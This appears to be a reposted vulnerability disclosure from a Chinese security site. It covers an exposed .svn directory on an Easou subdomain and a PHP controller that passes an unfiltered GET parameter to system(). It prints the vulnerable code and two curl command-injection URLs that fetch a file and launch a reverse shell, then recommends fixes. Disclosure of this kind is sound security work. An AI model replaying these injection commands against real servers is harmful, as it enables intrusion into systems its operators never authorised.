频道栏目
首页 > 安全 > 网站安全 > 正文
宜搜某分站配置不当已被getshell
2015-01-28 10:10:30         来源:米兰的小铁匠  
收藏   我要投稿

某神器扫描到。。。

某神器扫描到 svn地址泄露

https://wall.easou.com/.svn/entries



直接下载源码, 基于yii框架,文件

/protected/controllers/ProController.php
 

//开发者后台sdk下载(可以改包名)
    public function actionGetPackageName2()
    {
        $packageName='';
        $SDKType='';
        //   $url_base='https://winads.cn:80';
        if(isset($_GET['packageName']))$packageName=$_GET['packageName'];
        if(isset($_GET['SDKType']))$SDKType=$_GET['SDKType'];
        //报名前缀
        $filename_list=array(1=>'banner-',2=>'adwall-',3=>'offers-',4=>'alert-',5=>'push-');
        $filename=$filename_list[$SDKType].time();

        $aid=1;//代理号
        //  $command_str="/var/lib/jdk1.6.0_22/bin/java -jar /home/ledian/autosdk.jar {$packageName} {$SDKType} {$aid} {$filename}";
        // $aa = exec("/usr/bin/id");
        // $bb = system($command_str);
        // var_dump($aa);
        // var_dump($bb);
        // system("/home/ledian/autopack.sh {$packageName} {$SDKType} {$aid} {$filename}");

        system("/var/www/xyz/site/autopack.sh {$packageName} {$SDKType} {$aid} {$filename}");

        $url='https://sdkdown.winads.cn/sdkoutPack/'.$filename.'.zip';
//sdkoutPack
        echo '{"state":"OK","url":"'.$url.'"}';
        exit;
    }





额 system函数未过滤,导致命令注入,直接反弹shell



curl "https://wall.easou.com/index.php?r=pro/getpackagename2&packageName=| wget -O xxx |"

curl "https://wall.easou.com/index.php?r=pro/getpackagename2&packageName=| python /tmp/test.py xxx xxx |"


 

额,直接反弹shell,反弹shell程序在/tmp/test.py 请自行删除



在机器 /etc/nginx/sites-enabled ls结果如下:麻烦自行检测确认

 

easou.png




 

解决方案:

修复命令执行,修复svn泄露

 

点击复制链接 与好友分享!回本站首页
相关TAG标签 分站
上一篇:Mysql注入点在limit关键字后面的利用方法
下一篇:E-learning在线学习平台cookie#SQL注入
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站